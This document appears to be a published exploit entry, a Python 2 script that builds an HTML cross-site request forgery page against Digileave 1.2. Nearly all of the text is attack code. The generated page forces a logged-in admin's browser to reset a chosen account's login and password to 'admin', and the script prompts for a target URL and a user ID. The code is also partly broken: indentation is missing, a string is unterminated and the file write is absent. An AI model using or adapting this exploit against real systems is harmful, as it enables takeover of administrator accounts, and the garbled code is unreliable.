Digileave 1.2 - Cross-Site Request Forgery (Update Admin)

2017-09-18 15:05:11

# Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/digileave.asp?id=1
# Demo: http://www.digiappz.com/digileave/login.asp
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
import os
import urllib

if os.name == 'nt':

def csrfexploit():

e_baslik = '''
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/

Digileave 1.2 - CSRF (Update Admin)

print e_baslik

url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ")

csrfhtmlcode = '''
<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<td valign="middle">

<table border="0" align="center">
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
<font><b>Choose Login*</b></font>
<input name="login" size="30" value="admin" type="text">
<font><b>Choose Password*</b></font>
<input name="password" size="30" value="admin" type="text">
<font><b>First Name*</b></font>
<input name="first_name" size="30" value="admin" type="text">
<font><b>Last Name*</b></font>
<input name="last_name" size="30" value="admin" type="text">
<input name="email" size="30" value="<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="f8999c959196b8999c959196d69b9795">[email protected]</a>" onblur="emailvalid(this);" type="text">
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
''' %(url, id)

print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."

print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")

print(" [+] Your exploit is saved as %s")%filename

